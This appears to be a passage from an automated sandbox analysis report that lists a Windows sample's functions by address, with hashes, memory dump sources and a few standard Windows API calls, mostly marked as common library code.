                                                                                                                                                                                            • Instruction ID: 706f92410b1367afd182625b094b631e6f36bfaf8cf5c32d032bb38e9570cd5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: e252d5b591816923ae72f885aacfd8c4bb8a0e702958ff1fe6d65ab6185ba15b
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF02B3631030557DB16BF35DC46A6A7F95EFC1B60F07409DFB058B251C6729882CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00386E79 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00383A27,?,20001004,00000000,00000002,?,?,00383019), ref: 00386EAD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                            • Opcode ID: 0225b05b516c9c04dbfb43cd3af40b1eb341cfddae9fc6ac5208c847de063f21
                                                                                                                                                                                            • Instruction ID: 39b3cfeafd81ddea7b41a727b83ed293f403bccc5898067b600951726285730d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0225b05b516c9c04dbfb43cd3af40b1eb341cfddae9fc6ac5208c847de063f21
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E01A35501218BBCF133F61EC06A9E7A1AEB44750F158051FC0565162CB769A21ABA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003754D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000254F0,00374FA5), ref: 003754DA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: 537b60914795d2ffbb1727216031c144f9c57c213a55bea8a2b71f9ac91d9e8e
                                                                                                                                                                                            • Instruction ID: 9aa3f20f51458cbc38235a31920c8716b6bb4572b0afdd2a34258cddb2f5b717
                                                                                                                                                                                            • Opcode Fuzzy Hash: 537b60914795d2ffbb1727216031c144f9c57c213a55bea8a2b71f9ac91d9e8e
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00351A80 Relevance: .7, Instructions: 690COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ad3997cef4ef57c87b2df7ed3027d3610b58ecc720e588a6114c161b16f2395d
                                                                                                                                                                                            • Instruction ID: 82fdedba63d7d7f7aaffc13eeb8b8011b170f123594ec327bf59d4c322dcf114
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad3997cef4ef57c87b2df7ed3027d3610b58ecc720e588a6114c161b16f2395d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C52F330911764CFCB2ACF29C890AAABBF1FF56301F2545ADC99A5B762C735A944CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038F109 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 74267836dbd94e7d3a2c1cb3b76102863863d06f78ddeee11761d071d833486f
                                                                                                                                                                                            • Instruction ID: 309f4d6280a5222076d5c8b5d4af698832d727346af9a371b42b1cf50bf486fc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 74267836dbd94e7d3a2c1cb3b76102863863d06f78ddeee11761d071d833486f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1321622D29F054DD723A634D962335A28DAFB77C4F15D737F81AB5EA9EB29C4834200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00352EB0 Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a60c549f80fe78a74d5238dce8473fe94ba7a031f76263a2b31d4f1ff122ed15
                                                                                                                                                                                            • Instruction ID: f49166c6e8484fcc3ea99d432f047efeaa97e2493d629fc9c4e83e8adfe0f1af
                                                                                                                                                                                            • Opcode Fuzzy Hash: a60c549f80fe78a74d5238dce8473fe94ba7a031f76263a2b31d4f1ff122ed15
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A42AA75A00745CFCB2ACF69C490AAAFBF1FF49300F15856DD89A97761DB34AA49CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003524A0 Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a092acdacc76dc27789071abbf0051a22fe177ea77401910d0dee0bc6436ac02
                                                                                                                                                                                            • Instruction ID: 1863d925a9ede4fb673010ab476a456cbae1974196c8b43ac93d22e1a3012617
                                                                                                                                                                                            • Opcode Fuzzy Hash: a092acdacc76dc27789071abbf0051a22fe177ea77401910d0dee0bc6436ac02
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D120270511B108FC726CF2AC690A27BBF1FF9A712B50492DDAA787B61D275F848CB14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003558C0 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d34134334a96e5e8a5f3ab68a66cb4face8efe908b5072a97ed10b3434ec3b8d
                                                                                                                                                                                            • Instruction ID: ddae6383549dec7bca98de12b92dc77467faae870d62e0254b83a41a16748147
                                                                                                                                                                                            • Opcode Fuzzy Hash: d34134334a96e5e8a5f3ab68a66cb4face8efe908b5072a97ed10b3434ec3b8d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85E1C231A05749CFCB25CFACC890AAEFBB1BF55300F44865DD895AB752D730A909CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00351580 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6b398e0b8955f8ef9b1e5cfa2d8b035cd945e9b0d9480a05c98fe97178754874
                                                                                                                                                                                            • Instruction ID: b44fe99072cbf25e24a51f6207f3b9362d511f467d07f302a23fe96f23b4334f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b398e0b8955f8ef9b1e5cfa2d8b035cd945e9b0d9480a05c98fe97178754874
                                                                                                                                                                                            • Instruction Fuzzy Hash: 90E17F31A002298BDB29CF18D990BE9B7B1FF88345F5581E9D94DD7251EB309E89CF80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038C720 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                            • Opcode ID: af4dfd7f1f84c0d6c6ee2218b506076aee87df8bb7f2ca245146401c4ca9790a
                                                                                                                                                                                            • Instruction ID: 5eb819f75d7b316c106bcf8a7efb1586e78a35f98e6dd8ef274ec8ed61882158
                                                                                                                                                                                            • Opcode Fuzzy Hash: af4dfd7f1f84c0d6c6ee2218b506076aee87df8bb7f2ca245146401c4ca9790a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CB108755107058FDB3ABB64CC92AB7B3A8EF44308F1445EDE983CA681EB75E985C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00353BC0 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ee9ba8bfa531ce40467e685b095d8daa654b7e8ac396933399f30aa467eb99b9
                                                                                                                                                                                            • Instruction ID: 14f22b5ef377528b626bd5762ae1924364b05cd28d45f6940672a98811f59374
                                                                                                                                                                                            • Opcode Fuzzy Hash: ee9ba8bfa531ce40467e685b095d8daa654b7e8ac396933399f30aa467eb99b9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02D19F71A006159FCB25CF29C480A69F7F1FF48351F15822AEC59DBBA0E335EA94CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036A370 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a2dc898d737d19a1a4b06b7d0657b0796c45c47f7307a70611bbd8b3659b17b1
                                                                                                                                                                                            • Instruction ID: 4dad956bc4de35b8a81948007ed225e0bf0834033ab235543fc599ffaef66c0a
                                                                                                                                                                                            • Opcode Fuzzy Hash: a2dc898d737d19a1a4b06b7d0657b0796c45c47f7307a70611bbd8b3659b17b1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49C1C376E002195BEF08DEA8CC917FDBAB2EB88310F0D8539E911F7346CAB959119794
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00367290 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f46b2199bda3e1955c96c36a9b63bde5b36e1d127035934c2da0b71684e817e1
                                                                                                                                                                                            • Instruction ID: 04ede8dff3edcb5e69a33bd5672e87e962f833d87ad642e2d2b13b377cd000eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: f46b2199bda3e1955c96c36a9b63bde5b36e1d127035934c2da0b71684e817e1
                                                                                                                                                                                            • Instruction Fuzzy Hash: F4B169346187868FC30ACF28C45066AFBE1BF99304F948A1EF886C7755E770E955CB86
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003634E0 Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cbd5154997df5bd859549a31d51ee0ac633cd2f073188a6de64b8bae13f094db
                                                                                                                                                                                            • Instruction ID: e7d016d6b601dafd89c1e8289029fae129567072a2423850d20703c7fdbd9473
                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd5154997df5bd859549a31d51ee0ac633cd2f073188a6de64b8bae13f094db
                                                                                                                                                                                            • Instruction Fuzzy Hash: BD617B71E0020A9FDB15CF69C8806AEB7F6EF99310F25C569D956E7748E730EA11CB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036A070 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 722686e66830387311d75355ad13908e5f66143ec5f07f46730c677e0da0fefd
                                                                                                                                                                                            • Instruction ID: e4a476b8a88518109d0018a8b010521ca83c01e9c354daaabdff07e9629a4ee7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 722686e66830387311d75355ad13908e5f66143ec5f07f46730c677e0da0fefd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A511673E001246BDB18EAA99C41DBFF7BADFC9314B06817AF805FB241D6369D018AD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00373E50 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 31bd7eb2b6502ce20005ed65f0aff3a0bb4fc125eb5ad9bc68e54f3051c90e1f
                                                                                                                                                                                            • Instruction ID: 465706fda8e1adeb9421e971a3c3fa5ff1a2aa6fd5eefd68d3f961fa2d75f357
                                                                                                                                                                                            • Opcode Fuzzy Hash: 31bd7eb2b6502ce20005ed65f0aff3a0bb4fc125eb5ad9bc68e54f3051c90e1f
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB814535E00245CFDB26CF68C4907AEFBB2AF56300F1586ACD84887353C7399A49DB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003666E0 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a1e4ea8a0b040e841178d5b6f644c211451be2941b5ad59dbd2e94a292912edc
                                                                                                                                                                                            • Instruction ID: 3573e0eb6695f3a0f83653006bbacbafe1ddcad37a5c60a818d7243a047f3e96
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1e4ea8a0b040e841178d5b6f644c211451be2941b5ad59dbd2e94a292912edc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CE71B005168FDB09CF6DC8421BEB7B2EB983A4B69C63DD506DB748E630E911CB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0037BF8E Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
